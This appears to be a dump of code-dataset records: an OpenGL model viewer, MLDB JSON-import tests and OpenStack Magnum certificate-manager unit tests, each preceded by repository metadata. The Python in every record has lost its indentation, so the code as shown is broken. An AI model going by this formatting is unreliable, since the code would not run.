def __delitem__(self, key):
pass
def __iter__(self):
return iter(self.base)
def __len__(self):
return len(self.base)
|
91cfa2a15bc273f8eeed646f37bdf2e31697708c
|
e384f5467d8bcfd70845997bcbd68d950e874a61
|
/example/python/legacy_opengl/glfw_minimal_example_wavefront.py
|
b9bc884ad87a368a9be76c9ef7528e226cea97de
|
[] |
no_license
|
Rabbid76/graphics-snippets
|
ee642f1ed9ceafc6d320e467d3a084d2446d22c2
|
fa187afeabb9630bc1d988304fb5787e95a91385
|
refs/heads/master
| 2023-08-04T04:32:06.884318
| 2023-07-21T09:15:43
| 2023-07-21T09:15:43
| 109,126,544
| 177
| 12
| null | 2023-04-11T20:05:52
| 2017-11-01T12:05:56
|
C++
|
UTF-8
|
Python
| false
| false
| 1,936
|
py
|
glfw_minimal_example_wavefront.py
|
from OpenGL.GL import *
from OpenGL.GLU import *
from glfw.GLFW import *
from wavefrontloader import *
import os
os.chdir(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../resource'))
if glfwInit() == GLFW_FALSE:
exit()
glfwWindowHint(GLFW_SAMPLES, 8)
window = glfwCreateWindow(300, 300, "OpenGL Window", None, None)
glfwMakeContextCurrent(window)
#model = WavefrontDisplayList('./model/wavefront/bunny.obj')
model = WavefrontDisplayList('./model/wavefront/buddha.obj')
model_center, model_size = model.center, model.size
glLightfv(GL_LIGHT0, GL_AMBIENT, (0.2, 0.2, 0.2, 1.0))
glLightfv(GL_LIGHT0, GL_DIFFUSE, (0.6, 0.6, 0.6, 1.0))
glLightModeliv(GL_LIGHT_MODEL_TWO_SIDE, 1)
glEnable(GL_LIGHT0)
glEnable(GL_LIGHTING)
glEnable(GL_COLOR_MATERIAL)
glShadeModel(GL_SMOOTH)
start_time_s = glfwGetTime()
while not glfwWindowShouldClose(window):
current_time_s = glfwGetTime()
delta_time_s = current_time_s - start_time_s
vp_size = glfwGetFramebufferSize(window)
glViewport(0, 0, *vp_size)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glDisable(GL_DEPTH_TEST)
glBegin(GL_QUADS)
glColor3f(0, 0, 0)
glVertex2f(-1, -1)
glVertex2f(1, -1)
glColor3f(0.2, 0.6, 0.4)
glVertex2f(1, 1)
glVertex2f(-1, 1)
glEnd()
glMatrixMode(GL_PROJECTION)
gluPerspective(45, vp_size[0]/vp_size[1], min(model_size)/4, max(model_size)*4)
glMatrixMode(GL_MODELVIEW)
glTranslate(0, 0, -max(model_size)*2)
glLightfv(GL_LIGHT0, GL_POSITION, (0, 0, min(model_size), 0))
glEnable(GL_DEPTH_TEST)
glPushMatrix()
glRotatef(delta_time_s * 360/5, 0, 1, 0)
glTranslatef(-model_center[0], -model_center[1], -model_center[2])
model.render()
glPopMatrix()
glfwSwapBuffers(window)
glfwPollEvents()
glfwTerminate()
exit()
|
f1b92b572f6beb1a06d728439457189d8b13c00c
|
479a9c76b19b84d6cde69305828031cd2531aa56
|
/testing/MLDB-1266-import_json.py
|
2fb4a7ab3bae84af8f1d9557ddad5e03f7e9a725
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mldbai/mldb
|
d36801bd99dd3f82d7557cd0f438b0121f63f22c
|
19bc4bc92a41ee8ad4eab0979dffd9c985d95758
|
refs/heads/master
| 2023-09-03T22:59:11.621839
| 2022-12-30T18:42:24
| 2022-12-30T18:42:24
| 47,634,692
| 701
| 107
|
Apache-2.0
| 2023-02-10T23:08:05
| 2015-12-08T16:34:16
|
C++
|
UTF-8
|
Python
| false
| false
| 12,847
|
py
|
MLDB-1266-import_json.py
|
#
# MLDB-1266-import_json.py
# 2016
# This file is part of MLDB. Copyright 2016 mldb.ai inc. All rights reserved.
#
from functools import partial
if False:
mldb_wrapper = None
from mldb import mldb, MldbUnitTest, ResponseException
class ImportJsonTest(MldbUnitTest): # noqa
def assert_val(self, res, rowName, colName, value):
for row in res:
if str(row["rowName"]) != rowName:
continue
for col in row["columns"]:
if col[0] == colName:
self.assertEqual(col[1], value)
return
# did not find col
mldb.log(res)
mldb.log(rowName)
mldb.log(colName)
mldb.log(value)
assert False
# did not find row
mldb.log(res)
mldb.log(rowName)
mldb.log(colName)
mldb.log(value)
assert False
def do_asserts(self, row_prefix, js_res):
assert_val = partial(self.assert_val, js_res)
assert_val(row_prefix + "1", "colA", 1)
assert_val(row_prefix + "1", "colB", "pwet pwet")
assert_val(row_prefix + "2", "colB", "pwet pwet 2")
assert_val(row_prefix + "3", "colC.a", 1)
assert_val(row_prefix + "3", "colC.b", 2)
assert_val(row_prefix + "4", "colD.0", "{\"a\":1}")
assert_val(row_prefix + "4", "colD.1", "{\"b\":2}")
assert_val(row_prefix + "5", "colD.1", 1)
assert_val(row_prefix + "5", "colD.abc", 1)
def test_import_json_procedure(self):
conf = {
"id": "json_importer",
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
"id": "my_json_dataset",
"type": "sparse.mutable"
},
'arrays' : 'encode'
}
}
mldb.put("/v1/procedures/json_importer", conf)
res = mldb.get("/v1/query",
q="select * from my_json_dataset order by rowName()")
self.do_asserts("", res.json())
def test_import_invalid_json(self):
conf = {
"id": "json_importer",
"type": "import.json",
"params": {
"dataFileUrl":
"file://mldb/testing/dataset/json_dataset_invalid.json",
"outputDataset": {
"id": "my_json_dataset",
"type": "sparse.mutable"
},
"runOnCreation": True
}
}
with self.assertRaises(ResponseException):
mldb.put("/v1/procedures/json_importer", conf)
def test_ignore_bad_lines(self):
conf = {
"id": "json_importer",
"type": "import.json",
"params": {
"dataFileUrl":
"file://mldb/testing/dataset/json_dataset_invalid.json",
"outputDataset": {
"id": "my_json_dataset2",
"type": "sparse.mutable"
},
"runOnCreation": True,
"ignoreBadLines": True
}
}
mldb.put("/v1/procedures/json_importer", conf)
res = mldb.get("/v1/query",
q="select * from my_json_dataset2 order by rowName()")
js_res = res.json()
self.assert_val(js_res, "1", "colA", 1)
self.assert_val(js_res, "3", "colB", "pwet pwet 2")
def test_json_builtin_function(self):
csv_conf = {
"type": "import.text",
"params": {
'dataFileUrl' : 'file://mldb/testing/dataset/json_dataset.json',
"outputDataset": {
"id": "imported_json",
},
"quoteChar": "",
"delimiter": "",
"runOnCreation" : True,
}
}
mldb.put("/v1/procedures/csv_proc", csv_conf)
res = mldb.get(
"/v1/query",
q="select parse_json(lineText, {arrays: 'encode'}) as * from imported_json")
self.do_asserts("", res.json())
def test_mldb_1729_output_dataset_string_def(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": "my_json_dataset_1",
'arrays' : 'encode'
}
})
res = mldb.get("/v1/query",
q="SELECT * FROM my_json_dataset_1 ORDER BY rowName()")
self.do_asserts("", res.json())
def test_mldb_1729_output_dataset_string_def_params(self):
"""
Make sure the defaults don't overwrite the given config.
"""
conf = {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "my_json_dataset_2",
'params' : {
'unknownColumns' : 'error'
}
},
"runOnCreation": True
}
}
with self.assertRaises(ResponseException):
mldb.post("/v1/procedures", conf)
def test_where_filtering(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering",
},
"runOnCreation": True,
'where' : 'colA IN (1, 2)'
}
})
res = mldb.query("SELECT * FROM test_where_filtering")
self.assertTableResultEquals(res, [
['_rowName', 'colA', 'colB'],
['1', 1, 'pwet pwet'],
['2', 2, 'pwet pwet 2']
])
def test_select(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering",
},
"runOnCreation": True,
'select' : 'colA'
}
})
res = mldb.query("SELECT * FROM test_where_filtering")
self.assertTableResultEquals(res, [
['_rowName', 'colA'],
['1', 1],
['2', 2],
['3', 3],
['4', None],
['5', None],
['6', None]
])
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering_2",
},
"runOnCreation": True,
'select' : '* EXCLUDING (colA)'
}
})
res = mldb.query("""SELECT * FROM test_where_filtering_2
WHERE rowName()='1'
""")
self.assertTableResultEquals(res, [
['_rowName', 'colB'],
['1', 'pwet pwet']
])
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering_3",
},
"runOnCreation": True,
'select' : 'colA AS wololo'
}
})
res = mldb.query("""SELECT * FROM test_where_filtering_3
WHERE rowName()='1'
""")
self.assertTableResultEquals(res, [
['_rowName', 'wololo'],
['1', 1]
])
def test_named_base(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_named",
},
"runOnCreation": True,
'named' : 'colB',
'where' : 'colB IS NOT NULL'
}
})
res = mldb.query("""SELECT colB FROM test_named""")
self.assertTableResultEquals(res, [
['_rowName', 'colB'],
['pwet pwet', 'pwet pwet'],
['pwet pwet 2', 'pwet pwet 2'],
['pwet pwet 3', 'pwet pwet 3']
])
def test_named_on_object(self):
msg = 'Cannot convert value of type'
with self.assertRaisesRegex(ResponseException, msg):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering_2",
},
"runOnCreation": True,
'named' : 'colC',
'where' : 'colC IS NOT NULL'
}
})
def test_named_line_number_fct(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_named_line_number_fct",
},
"runOnCreation": True,
'named' : 'lineNumber() - 1',
}
})
res = mldb.query("SELECT colA FROM test_named_line_number_fct")
self.assertTableResultEquals(res, [
['_rowName', 'colA'],
["0", 1],
["1", 2],
["2", 3],
["3", None],
["4", None],
["5", None]
])
def test_no_input_file(self):
msg = "dataFileUrl is a required property and must not be empty";
with self.assertRaisesRegex(ResponseException, msg):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"outputDataset": {
'id' : "test_no_input_file",
},
"runOnCreation": True,
'named' : 'lineNumber() - 1',
}
})
with self.assertRaisesRegex(ResponseException, msg):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
'dataFileUrl' : '',
"outputDataset": {
'id' : "test_no_input_file",
},
"runOnCreation": True,
'named' : 'lineNumber() - 1',
}
})
with self.assertRaises(ResponseException):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
'dataFileUrl' : 'file:///idonotexist',
"outputDataset": {
'id' : "test_no_input_file",
},
"runOnCreation": True,
'named' : 'lineNumber() - 1',
}
})
def test_arrays_parse(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": "test_arrays_parse_ds",
'arrays' : 'parse'
}
})
res = mldb.query(
"SELECT * FROM test_arrays_parse_ds ORDER BY rowName()")
self.assertTableResultEquals(res, [
["_rowName", "colA", "colB", "colC.a", "colC.b", "colD.0.a",
"colD.1.b", "colD.0", "colD.1", "colD.2", "colD.3", "colD.4",
"colD.5", "colC.a.b"],
["1", 1, "pwet pwet", None, None, None, None, None, None, None, None, None, None, None],
["2", 2, "pwet pwet 2", None, None, None, None, None, None, None, None, None, None, None],
["3", 3, "pwet pwet 3", 1, 2, None, None, None, None, None, None, None, None, None],
["4", None, None, None, None, 1, 2, None, None, None, None, None, None, None],
["5", None, None, None, None, None, None, 1, 2, 3, 0, 5.25, "abc", None],
["6", None, None, None, None, None, None, None, None, None, None, None, None, 2]
])
if __name__ == '__main__':
mldb.run_tests()
|
6a61a289a7d9497e339a3f1dc281a366b43fb859
|
fb8d962a803ae1f6c20f80b458efd5ba17560b06
|
/magnum/tests/unit/conductor/handlers/common/test_cert_manager.py
|
7d29cedad3de1c23105d95dbab334179029d2cea
|
[
"Apache-2.0"
] |
permissive
|
openstack/magnum
|
980c2151388b8acc60f3ca2818e41431ffa742f4
|
eca79453c0097b0f63019821d3c2e9ecacebf784
|
refs/heads/master
| 2023-08-20T01:44:51.957778
| 2023-07-21T02:54:23
| 2023-07-25T09:00:40
| 26,314,357
| 345
| 282
|
Apache-2.0
| 2022-11-03T11:36:24
| 2014-11-07T10:08:50
|
Python
|
UTF-8
|
Python
| false
| false
| 23,605
|
py
|
test_cert_manager.py
|
# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from magnum.common import exception
from magnum.conductor.handlers.common import cert_manager
from magnum.tests import base
from oslo_config import cfg
import magnum.conf
import os
import stat
import tempfile
CONF = magnum.conf.CONF
class CertManagerTestCase(base.BaseTestCase):
def setUp(self):
super(CertManagerTestCase, self).setUp()
cert_manager_patcher = mock.patch.object(cert_manager, 'cert_manager')
self.cert_manager = cert_manager_patcher.start()
self.addCleanup(cert_manager_patcher.stop)
self.cert_manager_backend = mock.MagicMock()
self.cert_manager.get_backend.return_value = self.cert_manager_backend
self.cert_manager_backend.CertManager = mock.MagicMock()
self.CertManager = self.cert_manager_backend.CertManager
@mock.patch('magnum.common.x509.operations.generate_ca_certificate')
@mock.patch('magnum.common.short_id.generate_id')
def test_generate_ca_cert(self, mock_generate_id, mock_generate_ca_cert):
expected_ca_name = 'ca-name'
expected_ca_password = 'password'
expected_ca_cert = {
'private_key': 'private_key', 'certificate': 'certificate'}
expected_ca_cert_ref = 'ca_cert_ref'
mock_generate_id.return_value = expected_ca_password
mock_generate_ca_cert.return_value = expected_ca_cert
self.CertManager.store_cert.return_value = expected_ca_cert_ref
self.assertEqual((expected_ca_cert_ref, expected_ca_cert,
expected_ca_password),
cert_manager._generate_ca_cert(expected_ca_name))
mock_generate_ca_cert.assert_called_once_with(
expected_ca_name, encryption_password=expected_ca_password)
self.CertManager.store_cert.assert_called_once_with(
certificate=expected_ca_cert['certificate'],
private_key=expected_ca_cert['private_key'],
private_key_passphrase=expected_ca_password,
name=expected_ca_name,
context=None
)
@mock.patch('magnum.common.x509.operations.generate_client_certificate')
@mock.patch('magnum.common.short_id.generate_id')
def test_generate_client_cert(self, mock_generate_id, mock_generate_cert):
expected_name = 'admin'
expected_organization_name = 'system:masters'
expected_ca_name = 'ca-name'
expected_password = 'password'
expected_ca_password = 'ca-password'
expected_cert = {
'private_key': 'private_key', 'certificate': 'certificate'}
expected_ca_cert = {
'private_key': 'ca_private_key', 'certificate': 'ca_certificate'}
expected_cert_ref = 'cert_ref'
mock_generate_id.return_value = expected_password
mock_generate_cert.return_value = expected_cert
self.CertManager.store_cert.return_value = expected_cert_ref
self.assertEqual(
expected_cert_ref,
cert_manager._generate_client_cert(
expected_ca_name,
expected_ca_cert,
expected_ca_password))
mock_generate_cert.assert_called_once_with(
expected_ca_name,
expected_name,
expected_organization_name,
expected_ca_cert['private_key'],
encryption_password=expected_password,
ca_key_password=expected_ca_password,
)
self.CertManager.store_cert.assert_called_once_with(
certificate=expected_cert['certificate'],
private_key=expected_cert['private_key'],
private_key_passphrase=expected_password,
name=cert_manager.CONDUCTOR_CLIENT_NAME,
context=None
)
def _test_generate_certificates(self,
expected_ca_name,
mock_cluster,
mock_generate_ca_cert,
mock_generate_client_cert):
expected_ca_password = 'ca-password'
expected_ca_cert = {
'private_key': 'ca_private_key', 'certificate': 'ca_certificate'}
expected_cert_ref = 'cert_ref'
expected_ca_cert_ref = 'ca-cert-ref'
mock_generate_ca_cert.return_value = (expected_ca_cert_ref,
expected_ca_cert,
expected_ca_password)
mock_generate_client_cert.return_value = expected_cert_ref
cert_manager.generate_certificates_to_cluster(mock_cluster)
self.assertEqual(expected_ca_cert_ref, mock_cluster.ca_cert_ref)
self.assertEqual(expected_cert_ref, mock_cluster.magnum_cert_ref)
mock_generate_ca_cert.assert_called_with(expected_ca_name,
context=None)
mock_generate_client_cert.assert_called_once_with(
expected_ca_name, expected_ca_cert, expected_ca_password,
context=None)
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_generate_client_cert')
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_generate_ca_cert')
def test_generate_certificates(self, mock_generate_ca_cert,
mock_generate_client_cert):
expected_ca_name = 'ca-name'
mock_cluster = mock.MagicMock()
mock_cluster.name = expected_ca_name
self._test_generate_certificates(expected_ca_name,
mock_cluster,
mock_generate_ca_cert,
mock_generate_client_cert)
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_generate_client_cert')
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_generate_ca_cert')
def test_generate_certificates_without_name(self, mock_generate_ca_cert,
mock_generate_client_cert):
expected_ca_name = 'ca-uuid'
mock_cluster = mock.MagicMock()
mock_cluster.name = None
mock_cluster.uuid = expected_ca_name
self._test_generate_certificates(expected_ca_name,
mock_cluster,
mock_generate_ca_cert,
mock_generate_client_cert)
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_get_issuer_name')
def test_generate_certificates_with_error(self, mock_get_issuer_name):
mock_cluster = mock.MagicMock()
mock_get_issuer_name.side_effect = exception.MagnumException()
self.assertRaises(exception.CertificatesToClusterFailed,
cert_manager.generate_certificates_to_cluster,
mock_cluster)
@mock.patch('magnum.common.x509.operations.sign')
def test_sign_node_certificate(self, mock_x509_sign):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_ca_cert = mock.MagicMock()
mock_ca_cert.get_private_key.return_value = mock.sentinel.priv_key
passphrase = mock.sentinel.passphrase
mock_ca_cert.get_private_key_passphrase.return_value = passphrase
self.CertManager.get_cert.return_value = mock_ca_cert
mock_csr = mock.MagicMock()
mock_x509_sign.return_value = mock.sentinel.signed_cert
cluster_ca_cert = cert_manager.sign_node_certificate(mock_cluster,
mock_csr)
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.ca_cert_ref, resource_ref=mock_cluster.uuid,
context=None)
mock_x509_sign.assert_called_once_with(mock_csr, mock_cluster.name,
mock.sentinel.priv_key,
passphrase)
self.assertEqual(mock.sentinel.signed_cert, cluster_ca_cert)
@mock.patch('magnum.common.x509.operations.sign')
def test_sign_node_certificate_without_cluster_name(self, mock_x509_sign):
mock_cluster = mock.MagicMock()
mock_cluster.name = None
mock_cluster.uuid = "mock_cluster_uuid"
mock_ca_cert = mock.MagicMock()
mock_ca_cert.get_private_key.return_value = mock.sentinel.priv_key
passphrase = mock.sentinel.passphrase
mock_ca_cert.get_private_key_passphrase.return_value = passphrase
self.CertManager.get_cert.return_value = mock_ca_cert
mock_csr = mock.MagicMock()
mock_x509_sign.return_value = mock.sentinel.signed_cert
cluster_ca_cert = cert_manager.sign_node_certificate(mock_cluster,
mock_csr)
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.ca_cert_ref, resource_ref=mock_cluster.uuid,
context=None)
mock_x509_sign.assert_called_once_with(mock_csr, mock_cluster.uuid,
mock.sentinel.priv_key,
passphrase)
self.assertEqual(mock.sentinel.signed_cert, cluster_ca_cert)
def test_get_cluster_ca_certificate(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_ca_cert = mock.MagicMock()
self.CertManager.get_cert.return_value = mock_ca_cert
cluster_ca_cert = cert_manager.get_cluster_ca_certificate(mock_cluster)
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.ca_cert_ref, resource_ref=mock_cluster.uuid,
context=None)
self.assertEqual(mock_ca_cert, cluster_ca_cert)
def test_get_cluster_ca_certificate_ca_cert_type(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_ca_cert = mock.MagicMock()
self.CertManager.get_cert.return_value = mock_ca_cert
cluster_ca_cert = cert_manager.get_cluster_ca_certificate(
mock_cluster, ca_cert_type="front-proxy")
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.front_proxy_ca_cert_ref,
resource_ref=mock_cluster.uuid, context=None)
self.assertEqual(mock_ca_cert, cluster_ca_cert)
def test_get_cluster_magnum_cert(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_magnum_cert = mock.MagicMock()
self.CertManager.get_cert.return_value = mock_magnum_cert
cluster_magnum_cert = cert_manager.get_cluster_magnum_cert(
mock_cluster)
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.magnum_cert_ref, resource_ref=mock_cluster.uuid,
context=None)
self.assertEqual(mock_magnum_cert, cluster_magnum_cert)
def test_create_client_files_notin_cache(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cert_dir = os.path.join(mock_dir,
mock_cluster.uuid)
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
mock_ca_return = '%s/ca.crt' % cert_dir
mock_key_return = '%s/client.key' % cert_dir
mock_magnum_return = '%s/client.crt' % cert_dir
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
# Test that directory and files DNE
self.assertEqual(False, os.path.isdir(cert_dir))
self.assertEqual(False, os.path.isfile(mock_ca_return))
self.assertEqual(False, os.path.isfile(mock_key_return))
self.assertEqual(False, os.path.isfile(mock_magnum_return))
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
# Test the directory and files were created
self.assertEqual(True, os.path.isdir(cert_dir))
self.assertEqual(True, os.path.isfile(mock_ca_return))
self.assertEqual(True, os.path.isfile(mock_key_return))
self.assertEqual(True, os.path.isfile(mock_magnum_return))
# Test that all functions were called in the if not conditional
self.assertEqual(self.CertManager.get_cert.call_count, 2)
self.assertEqual(mock_cert.get_certificate.call_count, 2)
self.assertEqual(mock_cert.get_decrypted_private_key.call_count, 1)
# Test that contents were written to files & returned properly
cluster_ca_cert.seek(0)
cluster_key.seek(0)
cluster_magnum_cert.seek(0)
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_ca_cert.read())
self.assertEqual(mock_cert.get_decrypted_private_key.return_value,
cluster_key.read())
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_magnum_cert.read())
@mock.patch('magnum.conductor.handlers.common.cert_manager.LOG')
def test_create_client_files_temp_no_dir(self, mock_logging):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
cfg.CONF.set_override("temp_cache_dir", "", group='cluster')
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
mock_logging.debug.assert_called_once_with(
"Certificates will not be cached in the filesystem: "
"they will be created as tempfiles.")
self.assertEqual(self.CertManager.get_cert.call_count, 2)
self.assertEqual(mock_cert.get_certificate.call_count, 2)
self.assertEqual(mock_cert.get_decrypted_private_key.call_count, 1)
# Test that contents were written to files & returned properly
cluster_ca_cert.seek(0)
cluster_key.seek(0)
cluster_magnum_cert.seek(0)
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_ca_cert.read())
self.assertEqual(mock_cert.get_decrypted_private_key.return_value,
cluster_key.read())
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_magnum_cert.read())
# Test for certs and keys that might be returned in binary
mock_cert.get_certificate.return_value = b"byte_content"
mock_cert.get_decrypted_private_key.return_value = b"byte_key"
ca_cert_text = magnum_cert_text = \
mock_cert.get_certificate.return_value.decode('UTF-8')
magnum_key_text = \
mock_cert.get_decrypted_private_key.return_value.decode('UTF-8')
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
cluster_ca_cert.seek(0)
cluster_key.seek(0)
cluster_magnum_cert.seek(0)
self.assertEqual(ca_cert_text, cluster_ca_cert.read())
self.assertEqual(magnum_key_text, cluster_key.read())
self.assertEqual(magnum_cert_text, cluster_magnum_cert.read())
def test_create_client_files_in_cache(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
# First call creates directory and writes files
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
# Establish call count baseline
self.assertEqual(self.CertManager.get_cert.call_count, 2)
self.assertEqual(mock_cert.get_certificate.call_count, 2)
self.assertEqual(mock_cert.get_decrypted_private_key.call_count, 1)
# Second call to create_client_files for same cluster should enter else
# conditional, open cached file and return file contents unchanged.
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
# Test that function call count did not increase.
self.assertEqual(self.CertManager.get_cert.call_count, 2)
self.assertEqual(mock_cert.get_certificate.call_count, 2)
self.assertEqual(mock_cert.get_decrypted_private_key.call_count, 1)
# Check that original file contents/return values have not changed
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_ca_cert.read())
self.assertEqual(mock_cert.get_decrypted_private_key.return_value,
cluster_key.read())
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_magnum_cert.read())
def test_create_client_files_set_file_permissions(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cert_dir = os.path.join(mock_dir,
mock_cluster.uuid)
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
mock_ca_return = '%s/ca.crt' % cert_dir
mock_key_return = '%s/client.key' % cert_dir
mock_magnum_return = '%s/client.crt' % cert_dir
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
cert_manager.create_client_files(mock_cluster)
ca_permission = stat.S_IMODE(os.lstat(mock_ca_return).st_mode)
self.assertEqual(ca_permission, 0o600)
key_permission = stat.S_IMODE(os.lstat(mock_key_return).st_mode)
self.assertEqual(key_permission, 0o600)
magnum_permission = stat.S_IMODE(os.lstat(mock_magnum_return).st_mode)
self.assertEqual(magnum_permission, 0o600)
def test_delete_certificates(self):
mock_delete_cert = self.CertManager.delete_cert
expected_cert_ref = 'cert_ref'
expected_ca_cert_ref = 'ca_cert_ref'
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_cluster.ca_cert_ref = expected_ca_cert_ref
mock_cluster.magnum_cert_ref = expected_cert_ref
cert_manager.delete_certificates_from_cluster(mock_cluster)
mock_delete_cert.assert_any_call(expected_ca_cert_ref,
resource_ref=mock_cluster.uuid,
context=None)
mock_delete_cert.assert_any_call(expected_cert_ref,
resource_ref=mock_cluster.uuid,
context=None)
def test_delete_certificates_if_raise_error(self):
mock_delete_cert = self.CertManager.delete_cert
expected_cert_ref = 'cert_ref'
expected_ca_cert_ref = 'ca_cert_ref'
mock_cluster = mock.MagicMock()
mock_cluster.ca_cert_ref = expected_ca_cert_ref
mock_cluster.magnum_cert_ref = expected_cert_ref
mock_delete_cert.side_effect = ValueError
cert_manager.delete_certificates_from_cluster(mock_cluster)
mock_delete_cert.assert_any_call(expected_ca_cert_ref,
resource_ref=mock_cluster.uuid,
context=None)
mock_delete_cert.assert_any_call(expected_cert_ref,
resource_ref=mock_cluster.uuid,
context=None)
def test_delete_certificates_without_cert_ref(self):
mock_delete_cert = self.CertManager.delete_cert
mock_cluster = mock.MagicMock()
mock_cluster.ca_cert_ref = None
mock_cluster.magnum_cert_ref = None
cert_manager.delete_certificates_from_cluster(mock_cluster)
self.assertFalse(mock_delete_cert.called)
def test_delete_client_files(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cert_dir = os.path.join(mock_dir,
mock_cluster.uuid)
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
mock_ca_return = '%s/ca.crt' % cert_dir
mock_key_return = '%s/client.key' % cert_dir
mock_magnum_return = '%s/client.crt' % cert_dir
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
# Test the directory and files were created
self.assertEqual(True, os.path.isdir(cert_dir))
self.assertEqual(True, os.path.isfile(mock_ca_return))
self.assertEqual(True, os.path.isfile(mock_key_return))
self.assertEqual(True, os.path.isfile(mock_magnum_return))
cert_manager.delete_client_files(mock_cluster)
# Test that directory and files DNE
self.assertEqual(False, os.path.isdir(cert_dir))
self.assertEqual(False, os.path.isfile(mock_ca_return))
